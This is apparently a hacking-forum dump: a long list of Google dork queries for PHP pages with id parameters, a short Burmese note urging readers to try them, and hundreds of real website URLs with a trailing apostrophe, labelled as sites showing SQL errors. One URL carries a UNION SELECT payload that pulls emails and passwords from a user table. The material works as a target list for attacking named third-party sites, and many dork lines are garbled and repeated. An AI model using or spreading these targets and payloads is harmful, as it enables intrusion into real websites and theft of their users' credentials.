inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
အထကးပါ Dork မာထမြ မမအဆငးေပတ Dork နရြာပ စမးသပးနငးပါတယး။
SQL Error (Vuln) ရြေနေသာကးဘးဆကးမာစစညးမြ
http://www.registerforevent.rs/event.php?id=1191'
http://www.sedicifilm.it/games.php?id_cat3=61'
http://www.adas-fusion.eu/theme.php?id=2'
http://www.actforkids.com.au/news_full.php?id=111'
http://www.ezskincare.com/theme.php?id=1'
http://hcpoa.com/readnews.php?id=32'
http://www.reallymeansounds.com/events/event.php?id=477'
http://www.themackwoodgroup.com/view_product.php?id=1027120263040942700'
http://www.vacancesetmontagne.fr/theme.php?id=7'
http://www.inner-live.com/index.php?task=channels&action=view&channel_id=452'
http://www.super-buys.co.uk/shops.php?field1=127'
http://www.aportescriticos.com.ar/es/curriculum.php?id_cv=2'
http://www.vainerepaoliello.com.br/curriculum.php?id=7'
http://www.matamorosenred.com/ver_curriculum.php?id=23'
http://ultimatehomedesign.com/news-detail.php?id=312'
http://www.firagirona.com/participant.php?id=108&cl=5634'
http://www.firagirona.com/participant.php?id=62&cl=6399'
http://www.ceripp.it/curriculum.php?id=1'
http://www.dentistry.co.uk/news/news_detail.php?id=1442'
http://lumopro.com/product.php?id=66'
http://www.rogersspecialtysales.ca/show.php?id=18''
http://dinebaltimore.com/review.php?id=115'
http://www.bia2.com/music-review/review.php?id=182'
http://www.worldstylingtt.com/category.php?id=5'
http://spokesrecords.com/releases.php?id=12'
http://www.plusline.org/article.php?id=4695'
http://www.wedding-cake-toppers.com.au/productinfo.php?ID=15'
http://dvdholocaust.com/review.php?id=577'
http://www.laserltd.ps/cat/showimg.php?id=1040'
http://www.abalar.es/ampliar_material.php?id_material=11'
http://www.clicfolio.com/clicfolio/curriculum.php?id=10505'
http://www.fundraisingnetwork.org/cat-Games.php?id=39'
http://www.f4customs.com/videos_pages.php?id=5'
http://bbs.yayu.org/look.php?id=227'
http://www.ngo-monitor.org/article.php?id=1564'
http://www.armorysquareofsyracuse.com/main/shopping.php?id=15'
http://www.elitebicycles.com/athletes_detail.php?id=42'
http://www.armorysquareofsyracuse.com/main/shopping.php?id=179'
http://enpi-info.eu/main.php?id=344&id_type=2'
http://dvdholocaust.com/review.php?id=289'
http://www.rentray.nl/over_rentray.php?id=14'
http://games.zbeng.net/game.php?id=2'
http://www.rentray.nl/over_rentray.php?id=53'
http://www.waukee.org/event.php?id=19'
http://www.narkissosshavingoil.com/product/item.php?ID=2'
http://www.themetalcircus.com/review.php?id=3096'
http://www.laserltd.ps/cat/showimg.php?id=85'
http://www.cedec.ca/index.php?id=1'
http://www.maxprotech.com/maxpro-product-detail.php?id=48'
http://www.cam-ceeds.org/event.php?ID=30'
http://www.ferobrake.co.za/productdetail.php?id=19'
http://www.illoomballoon.com/news.php?id=112'
http://www.skbcases.com/music/news/news-detail.php?id=24'
http://www.rec.org/event.php?id=286'
http://www.playdowns.com/nbca/event.php?id_cmp=10'
http://www.selfpp.com/gallery.php?ID=8'
http://tko.sciencenoodle.com/game.php?id=60987'
http://www.dracoders.com/games.php?id=7'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=32+'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=29+'
http://www.shoppingtang.com/productinfo.php?id=294'
http://www.sealchemistry.co.za/readnews.php?id=10'
http://www.notebookfocus.com/readnews.php?id=343'
http://www.hkyongnuo.com/e-detail.php?ID=241'
http://www.bryansmarine.com/section.php?id=10'
http://hcpoa.com/readnews.php?id=73'
http://mappn.com/game.php?id=11'
http://www.onradio.gr/player.php?id=388'
http://www.vertexlaw.co.uk/news/detail.php?id=000147'
http://www.wildarttaxidermy.co.uk/gallery.php?id=16'
http://www.kudosshowers.co.uk/gallery.php?id=3'
http://www.wildarttaxidermy.co.uk/gallery.php?id=86'
http://www.scotclimb.org.uk/gallery.php?id=3'
http://www.scotclimb.org.uk/gallery.php?id=83'
http://www.cfnielsen.com/material.php?id=19'
http://ww2.fairfaxtimes.com/cms/story.php?id=1195'
http://www.bernard-vidal.com/view-photo.php?id=75'
http://ww2.fairfaxtimes.com/cms/story.php?id=1050'
http://www.aoamumbai.in/publications.php?id=49'
http://www.infocajeme.com/humor.php?id=12'
http://www.funlandz.com/find_person.php?id=180071'
http://www.gorodokboxing.com/material.php?id=2'
http://www.datamp.org/patents/search/xrefPerson.php?id=6509'
http://www.babycareadvice.com/babycare/general_help/article.php?id=18'
http://kb.calyxsupport.com/kb/article.php?id=308'
http://www.gymka.com/english/detail_produit.php?id=328'
http://www.thefutureisfierce.com/releases.php?ID=49'
http://www.datamp.org/patents/search/xrefPerson.php?id=7413'
http://baywoodbest.com/listingPop.php?Id=620'
http://www.nissi-beach.com/section.php?id=13'
http://evt-me.com/newsDetail.php?id=8'
http://www.bernard-vidal.com/view-photo.php?id=76'
http://www.notebookfocus.com/readnews.php?id=589'
http://www.istl.com/view-product.php?ID=54'
http://www.fitnessbuildshealth.com/trainers.php?id=88'
http://www.techvision.co.uk/news.php?id=45'
http://www.guruslodge.com/index.php?topic=6484.0'
http://www.fanfics.ru/read.php?id=1515'
http://www.henleystandard.co.uk/news/news.php?id=36113'
http://www.facingthegiants.com/news.php?id=2'
http://www.pioneer-group.co.uk/event.php?id=16'
http://terekon.ru/material.php?id=6'
http://www.chambers.ie/preview.php?id=889'
http://www.yboaofnc.com/event.php?id=3'
http://www.amandala.com.bz/newsadmin/preview.php?id=6926'
http://princesspaper.com/pages/view-product.php?id=2'
http://rec.org/event.php?id=306'
http://www.bombasticlife.com/place/review.php?id=504'
http://www.kingslynnarts.co.uk/whatson_event.php?id=46'
http://www.nowgen.org.uk/facilities/events/event.php?id=30'
http://www.bia2.com/music-review/review.php?id=248'
http://www.walesdirectory.co.uk/events/event.php?id=2445'
http://www.nowgen.org.uk/facilities/events/event.php?id=11'
http://www.doggerfisher.com/artists/publications.php?id=47'
https://powertraveller.com/news/detail.php?id=000126'
http://www.prosportsgroup.com/agent-info.php?id=55'
http://www.highlandvillage.org/event.php?id=72'
http://www.edseven.com/item_look.php?id=4'
http://www.nmtf.co.uk/index.php?id_cpg=1'
http://www.minesandcommunities.org/look.php?id=54'
http://www.minesandcommunities.org/look.php?id=101'
http://infocajeme.com/humor.php?id=38'
http://www.geneticsandsociety.org/article.php?id=282'
http://www.chambers.ie/preview.php?id=932'
http://www.worapongengineering.com/project_pop.php?Id=32'
http://www.twitney.co.uk/theme.php?id=5'
http://www.anchoryachts.com/preview.php?ID=249'
http://www.nsche.org.ng/communiquedetail.php?ID=3'
http://www.twitney.co.uk/theme.php?id=6'
http://www.feicuidao.com/jqzx_look.php?id=29'
http://www1.kingsborough.edu/sub-other/sub-student/scholarshipdb/pop.php?id=331'
http://www.bonsaitrees.com/gallery.php?id=7'
http://www.amrproductions.nl/faq/view_faq.php?id=7'
http://www.highlandvillage.org/event.php?id=7'
http://reallymeansounds.com/events/event.php?id=529'
http://holidayvillagerodos.com/gallery.php?id=1'
http://www.schoolofbhagavadgita.org/shopping.php?id=45'
http://www.ecstasydata.org/view.php?ID=1888'
http://www.pialombardia4.it/newscat.php?id_newscategory=2'
http://www.konceive.com.au/riverside/investAnnounce.php?id=43'
http://www.bonsaitrees.com/gallery.php?id=4'
http://www.eventdirect.ca/game.php?ID=62'
http://www.firagirona.com/participant.php?id=73&cl=6541'
http://www.firagirona.com/participant.php?id=32&cl=10022'
http://www.humanrights.uconn.edu/publications.php?id=37'
http://www.sportident.co.uk/full_story.php?id=115'
http://courtnews.co.nz/story.php?id=1912'
http://biclopsgames.com/game.php?id=6'
http://www.humanrights.uconn.edu/publications.php?id=19'
http://apiexchange.com/index_main.php?id=1'
http://www.hotelsayianapa.com/section.php?id=11'
http://www.kipepeo.org/insect-gallery.php?id=58'
http://www.fn-franchecomte.com/communique_detail.php?id=145'
http://www.stonemarket.co.uk/section.php?id=1'
http://www.skywatcher.com/swtinc/product.php?id=30&class1=1&class2=102'
http://www.psychology.org.nz/cms_show_download.php?id=559'
http://www.fn-franchecomte.com/communique_detail.php?id=29'
http://www.medix.com.hr/aboutbook.php?id=30'
http://thehimalayantimes.com/tgifnfw11/theme.php?id=259'
http://www.excellentdevelopment.com/news_detail.php?id=136'
http://www.simon-dean.co.uk/motor_news/motor_news_detail.php?ID=35'
http://www.natalpress.com.br/humor.php?id=10627'
http://www.cross.tv/52818?channel_id=1104'
http://www.cbmin.org/cbm/staff?staff_id=10'
http://olympicresidence.com/gallery.php?id=13'
http://www.ath-elite.com.au/trainers.php?id=28'
http://familynewsabout.com/aboutBook.php?id=3241'
http://www.mvsport-tuning.com/viewProduct.php?id=43'
http://www.leadacidbatteryinfo.org/newsdetail.php?id=18'
http://www.avmaniacs.com/review.php?id=1054'
http://www.clicfolio.com/clicfolio/curriculum.php?id=5294'
http://byeu.org/photos/viewphoto.php?ID=194'
http://www.cbmin.org/cbm/staff?staff_id=6'
http://www.coastal-koi.com/view_product.php?id=954'
http://www.drummajorinstitute.org/events/unique_event.php?ID=38'
http://www.gorodokboxing.com/material.php?id=1'
http://www.ldschurchtemples.com/sandiego/gallery/download.php?id=272'
http://www.dvdmaniacs.net/review.php?id=318'
http://www.themarketingsite.com/live/content.php?Item_ID=5925'
http://www.dmgems.co.uk/pages.php?id_sec=15'
http://www.faithinplace.org/news.php?ID=58'
http://www.barcode.md/post.php?id=20'
http://www.sheridan-uk.com/news_detail.php?id=52'
http://www.individualcars.com/inventory/detail.php?ID=685'
http://www.bsp.org.uk/news_full.php?id=31'
http://www.amandala.com.bz/newsadmin/preview.php?id=28'
http://flatbearconsulting.com/pages.php?id_pag=6'
http://www.girls.njpanthers.com/preview.php?id=25'
http://www.hotproperties-bayarea.com/readnews.php?id=2'
http://www.dmgems.co.uk/pages.php?id_sec=2'
http://www.shxingba.com/product/prodinfo.php?id=62'
http://www.cheap-web-hosting-info.com/hosting_review.php?id=8'
http://inrecs.com/releases.php?id=37'
http://www.planetbollywood.com/displayReview.php?id=m101411095354'
http://techloopreviews.com/review.php?id=89'
http://www.rentray.nl/over_rentray.php?id=11'
http://dailyexhibit.com/theme.php?id=1224 ForceRecrawl: 0'
http://www.rentray.nl/over_rentray.php?id=12'
http://yoga.ge/pages/theme.php?id=109'
http://www.vertexlaw.co.uk/news/detail.php?id=000083'
http://terekon.ru/material.php?id=1'
http://www.ristorantelarsenale.com/newscat.php?id_newscategory=2'
http://www.thejewishmuseum.org/site/pages/event.php?id=348'
http://www.peterduff.com/main.php?ID=1'
http://www.sagemont.com/class_pages.php?id=940170'
http://www.nutritioncare.net/pages.php?id=12'
http://www.therightdentist.com/profileview.php?id=124859'
http://www.oceansurf.ca/gallery.php?id=16'
http://www.individualcars.com/inventory/detail.php?ID=604'
http://www.gta-
modding.it/area/index.php?act=view&id=34+...%2F%2Ftrainers.php%3Fid%3D4-
1+union+select+0%2C1%2C2%2Cconcat%28email%2C0x3a%2Cpass%29%2C4%2C5%2C6%
2C7%2C8+f rom+koobi_user'
http://www.craftaustralia.org.au/library/review.php?id=blurring_the_boundaries'
http://www.luimo.org/curriculum.php?id=ST000019'
http://www.djangosolos.com/title.php?id=128'
http://www.kagakribet.com/humor.php?id=157'
http://fitnessbuildshealth.com/trainers.php?id=32'
http://www.portalararuna.com.br/2011/humor.php?id=10'
http://www.plusline.org/article.php?id=6068'
http://gp.org/speakers/detail.php?ID=42'
http://www.glac.fr/en/produit.php?id=84'
http://www.glac.fr/en/produit.php?id=98'
http://www.thefutureisfierce.com/releases.php?ID=25'
http://internal.ccuniversity.edu/ministryjobboard/post.php?ID=5242'
http://www.trailercityportland.com/product.php?id=559'
http://www.valiani.com/computerised_detail.php?ID=1'
http://www.craftaustralia.org.au/library/review.php?id=ghost_nets'
http://www.jocuri-online.net/game.php?id=5'
http://www.4wdsystems.com.au/index.php?id=29'
http://www.ath-elite.com.au/trainers.php?id=25'
http://www.amrproductions.nl/faq/view_faq.php?id=8'
http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=29'
http://campus.sanook.com/inlove/read.php?id=86'
http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421'
http://www.ianforsythphotographer.com/main.php?id=1'
http://www.saumon-fqsa.qc.ca/en/section.php?ID=16'
http://www.dkggroup.com/newsdetail.php?id=165'
http://www.kagakribet.com/humor.php?id=147'
http://www.datraveler.com/main/theme.php?id=214'
http://www.constructionspares.com/main.php?ID=6'
http://www.punp.edu.ph/main.php?id=33'
http://slantmagazine.com/giveaway_detail.php?id=2'
http://shohomes.com/gallery.php?id=10'
http://senl.com/nav/artikel_info.php?id=1388'
http://senl.com/nav/artikel_info.php?id=574'
http://www.cross.tv/52790?channel_id=1104'
http://www.newlife.co.uk/show.php?id=592'
http://www.thecompletepianist.com/material.php?id=7'
https://www.camillushouse.org/news_center/news_detail.php?ID=78'
http://www.liquidafrica.com/newsdetail.php?id=1246'
http://dvdholocaust.com/review.php?id=68'
http://dvdmaniacs.net/review.php?id=974'
http://www.msmedicalsystems.com.br/ecommerce/product_info.php?id_produto=221'
http://www.allnations.net/equipment/prodinfo.php?ID=235'
http://www.neilprydemaui.com/category.php?id=6'
http://www.atitelemetry.com/viewapp.php?id=7'
http://www.dynamicptmichigan.com/news.php?id=22'
http://www.pcofiowa.com/news.php?id=15'
http://www.benlongfineart.com/news.php?id=13'
http://stadiumsportsllc.com/news_view.php?id=20'
http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=747'
http://www.ristorantelarsenale.com/newscat.php?id_newscategory=3'
http://www.galleri-a.no/main.php?id=utstilling&utstillingid=1231337157'
http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=67'
http://www.futuresfins.com/fin-detail.php?id=69'
http://core.materials.ac.uk/search/detail.php?id=1803'
http://wordtheatre.com/events/event.php?id=140'
http://www.pimp-codes.com/preview.php?id=1544'
http://www.shirtsenletters.nl/nav/artikel_info.php?id=1377'
http://www.guitars4you.co.uk/product-detail.php?id=413'
http://www.bsp.org.uk/news_full.php?id=55'
http://www.internationalstudents.org/culture-humor.php?idlv2=39'
http://www.2hgs.com/detail_humor.php?ID=38'
http://www.2hgs.com/detail_humor.php?ID=27'
http://www.namcap.net/view_product.php?id=31'
http://www.plagij.at/tran.php?id=1071'
http://www.salon52.ca/academies/curriculum.php?id=174'
http://www.skbcases.com/music/news/news-detail.php?id=156'
http://dailyexhibit.com/theme.php?id=1224'
http://www.avmaniacs.com/review.php?id=1472'
http://www.sanpantaleo.sardegna.it/shopping.php?ID_STRUTTURA=16'
http://enpi-info.eu/main.php?id=403&id_type=2'
http://mayfairgames.com/game.php?id=212'
http://thehimalayantimes.com/tgifnfw11/theme.php?id=231'
http://www.hplus.sk/title.php?id=27'
http://tattoosbybryan.com/showimg.php?id=52'
http://www.runningmyraces.com/event.php?id=1870'
http://www.pialombardia4.it/newscat.php?id_newscategory=3'
http://www.inkprints.com/php/productlist/productitem.php?id=1459'
http://www.wcac.org/show.php?id=1'
http://www.djinsure.com/faq/viewFAQ.php?id=8'
http://www.hypetrading.com/productinfo.php?id=285'
http://greyhenpress.com/news.php?id=4'
http://www.gielighting.com/ang/_produit.php?id_cat=3'
http://www.intech-tunisia.com/ang/produit.php?id_cat1=3&id_cat=1'
http://www.intech-tunisia.com/ang/produit.php?id_cat1=2&id_cat=1'
http://www.ceripp.it/curriculum.php?id=9'
http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=226'
http://www.medpharma-ae.com/showimg.php?id=160'
http://www.clickautographs.com/detail.php?id=972'
http://www.buzzylinhart.com/news-view.php?id=18'
http://games.zbeng.net/game.php?id=13'
http://www.ma-maas.nl/prodDetail.php?id_prd=63'
http://www.mygoodact.com/collectiondetailperson.php?id=54'
http://www.sigmaspa.com/web/prod_detail.php?ID=225'
http://www.broderna-anderssons.se/prod_detail.php?id=109'
http://queensfashion-paris.fr/ang/produit.php?id=23'
http://cornthwaites.co.uk/viewproduct.php?id=439&catid=6'
http://www.seanscottphotography.com.au/shop_category.php?id=2'
http://www.webcommerce.insee.fr/fiche-produit.php?id_produit=2327'
http://www.macmahonphoto.fr/produit.php?id=232&table=H%E9liopan'
http://www.edseven.com/item_look.php?id=13'
http://www.busaccagallery.com/item_info.php?id=2756'
http://www.areyoureadytoorder.co.uk/review.php?id=251'
http://www.y2neil.com/reviews/review.php?id=17'
http://www.dellorto.fr/details-produit.php?id_produit=2042'
http://weddingdressmarket.com/info.php?id=7413'
http://www.biclopsgames.com/game.php?id=1'
http://byeu.org/photos/viewphoto.php?ID=189'
http://www.lifedesigns.org/viewproduct.php?id=92'
http://www.bernard-vidal.com/view-photo.php?id=81'
http://www.medpharma-ae.com/showpost.php?id=68'
http://www.svasweb.org/news.php?id=59'
http://old.brownsvilleherald.com/opinions.php?id=0'
http://www.cupid.biz/support/opinions.php?id=61'
http://www.armorysq.org/main/shopping.php?id=157'
http://www.babycareadvice.com/babycare/general_help/article.php?id=48'
http://ux.brookdalecc.edu/fac/tlc/fac/tlc_blog_post.php?id=11'
http://www.mamalibro.com/pagines/llibre_opinions.php?id=9788434237872'
http://www.caiguoqiang.com/project_detail.php?id=196'
http://www.cometantenna.com/newPro_detail.php?ID=234'
http://perkins.pvt.k12.ma.us/museum/section.php?id=214'
http://wwww.newlife.co.uk/show.php?id=107'
http://www.totemcreation.fr/produits/theme.php?idtheme=797&idrub=100'
http://www.tourisme-boulognesurmer.com/shopping.php?id=36'
http://www.chinafashiontang.com/productinfo.php?id=627'
http://mayfairgames.com/game.php?id=341'
http://www.emaxxtech.com/view_faq.php?id=44'
http://alliemsalon.com/news_full.php?id=16'
http://www.dracoders.com/games.php?id=14'
http://www.digitaldickens.com/section.php?id=6'
http://www.equality-ne.co.uk/readnews.php?id=3728'
http://www.cupid.biz/support/opinions.php?id=46'
http://www.traikos.us/trends_opinions.php?id=5'
http://www.cometantenna.com/newPro_detail.php?ID=264'
http://www.bulletproofautomotive.com/catalog-detail.php?ID=7265'
http://www.ec21th.com/productinfo.php?id=194'
http://www.shoppingtang.com/productinfo.php?id=103'
http://www.hbztrade.com/productinfo.php?id=273'
http://www.macmahonphoto.fr/produit.php?id=196&table=H%C3%A9liopan'
http://www.spraywaysingapore.com/proddetail.php?ID=17'
http://drugandalcoholeducationservices.co.uk/news_detail.php?id=1'
http://propartsllc.com/prodDetail.php?ID=596'
http://www.melbournefineart.com.au/gallery.php?id=18'
http://www.spraywaysingapore.com/proddetail.php?ID=13'
http://www.robotech.com/community/forum/messages.php?id=23'
http://www.llangollen-railway.co.uk/event.php?id=80'
http://www.shop-gun.fr/product.php?id_product=510'
http://www.hebron.com/english/gallery.php?id=190'
http://courtnews.co.nz/story.php?id=1660'
http://www.backbiomass.co.uk/newsroom-story.php?id=19'
http://www.bulletproofautomotive.com/catalog-detail.php?ID=7057'
http://www.srilankatravelcentre.com/pages.php?id=47'
http://ethansreview.com/website.php?id=1'
http://www.svasweb.org/news.php?id=77'
http://www.austells.net/news/news_full.php?id=35'
http://www.vertexlaw.co.uk/news/detail.php?id=000171'
http://www.ebambi.com/profile_view.php?id=100000008'
http://www.cabinetglass.com/preview.php?id=352'
http://www.henleystandard.co.uk/news/news.php?id=799582'
http://www.masshist.org/database/doc-viewer.php?item_id=99'
http://www.evene.fr/forum/theme.php?id_theme=13'
http://www.shop-gun.fr/category.php?id_category=13'
http://www.drummajorinstitute.org/events/unique_event.php?ID=49'
http://www.walkamilepeterborough.com/participant.php?id=94'
http://www.yboaofnc.com/event.php?id=8'
http://www.prespec-consulting.com/theme/theme.php?id_theme=7'
http://www.eia.org.uk/view.php?id=948'
http://www.rockthewok.com/readnews.php?id=24'
http://www.sghgate.net/productinfo.php?id=627'
http://mikesmit.com/show_post.php?id=1175207880'
http://www.djinsure.com/faq/viewFAQ.php?id=13'
http://www.fspacerpg.com/proddetail.php?ID=FSPEB103'
http://www.narkissosshavingoil.com/product/item.php?ID=1'
http://www.oiwsba.com/oiwsba/memberinfo.php?id=54'
http://www.bayareaassn.com/memberinfo.php?id=7'
http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=101'
http://staff-driver.net/page.php?file=vacansys&vacstart=10'
http://www.bengaldens.com/detail_all_post.php?id=78'
http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=321'
http://www.suagacollection.com/photo-gallery.php?id=1'
http://www.srilankatravelcentre.com/pages.php?id=49'
http://www.sedicifilm.it/games.php?id_cat3=55'
http://www.motorxchange.fr/destockages.php?id_destockage=123'
http://www.gocontempo.com/pages.php?id=2'
http://inrecs.com/releases.php?id=1'
http://www.nsche.org.ng/communiquedetail.php?ID=2'
http://www.aquasignal.info/us/cms/htdocs/main.php?id=209'
http://www.discoverypartnerships.com/register/curriculum.php?id=44'
http://www.ghnats.org/pages.php?id=2'
http://www.worldmusicinstitute.org/event.php?id=906'
http://wminyc.org/event.php?id=1072'
http://www.arcana.com/view_title.php?id=189'
http://spokesrecords.com/releases.php?id=2'
http://www.canalchat.com/transcript.php?id_alaffiche=1013'
http://www.canalchat.com/transcript.php?id_alaffiche=783'
http://cloneemotorcentre.ie/faq2.php?id=15'
http://komagan.net/readnews.php?id=5'
http://fpchurch.org.uk/News/view.php?id=26'
http://sflcn.com/story.php?id=9826'
http://www.oldtimephotos.org/gallery.php?id=11'
http://www.latintourdimensions.com/overview/product_detail.php?id=352'
http://www.latintourdimensions.com/overview/product_detail.php?id=86'
http://www.seanscottphotography.com.au/shop_category.php?id=1'
http://mappn.com/game.php?id=3'
http://www.geneticsandsociety.org/article.php?id=129'
http://www.uslandandhome.com/detail.php?id=2649'
http://www.ndc.ps/main.php?id=9'
http://www.falltvpreview.com/show.php?id=1037'
http://www.timeref.com/myperson.php?id=1752'
http://www.trumanlibrary.org/photographs/view.php?id=392'
http://perkins.pvt.k12.ma.us/museum/section.php?id=213'
http://ohr.edu/ask_db/ask_main.php?id_number=222'
http://www.torinofilmlab.it/person.php?id=344'
http://www.torinofilmlab.it/person.php?id=338'
http://ce.et.tudelft.nl/person.php?id=926'
http://www.natalpress.com.br/humor.php?id=7775'
http://www.driftsurfing.eu/surf_article.php?id=1880'
http://www.emaxxtech.com/view_faq.php?id=34'
http://www.hotproperties-bayarea.com/readnews.php?id=11'
http://www.stonemarket.co.uk/section.php?id=3'
http://www.micronanosystems.co.uk/nano_news_full.php?id=72544'
http://www.brock.ac.uk/news/news/detail.php?id=000178'
http://www.brock.ac.uk/news/news/detail.php?id=000189'
http://www.thedockyard.co.uk/photo_gallery_pop.php?id=43'
http://www.inner-live.com/index.php?task=channels&action=view&channel_id=339'
http://www.drinksontario.com/memberinfo.php?id=70'
http://www.hebron.com/english/gallery.php?id=170'
http://www.evene.fr/forum/theme.php?id_theme=19'
http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418'
http://www.irishart.com/dispgallery.php?id=518'
http://linkinthebox.com/productinfo.php?id=109'
http://www.wall4me.com/uk/page_produit.php?id=16'
http://www.carhs.de/en/company/news/full.php?Id=202'
http://www.austells.net/news/news_full.php?id=30'
http://www.humormillnews.com/hmill/read.php?id=13'
http://lemhiweb.com/news.php?id=36'
http://www.shirtsenletters.nl/nav/artikel_info.php?id=631'
http://www.boys.njpanthers.com/preview.php?id=24'
http://www.fasl.ch/activites/tous_annonces_ages.php?idcentre'
http://en.swfplay.net/game.php?id=104'
http://www.gp.org/speakers/detail.php?ID=29'
http://www.polkatheatre.com/event.php?id=43'
http://brml.technion.ac.il/publications.php?id=7'
http://www.gordonsmithguitars.co.uk/products/category.php?id=2'
http://www.18eighty.com/os_view_product.php?id=37'
http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233'
http://www.tecnologi.net/wp/curriculum.php?id=237'
http://www.worldstyling.com/web/product_detail.php?id=95'
http://cherokeeguitar.com/product-detail.php?id=16'
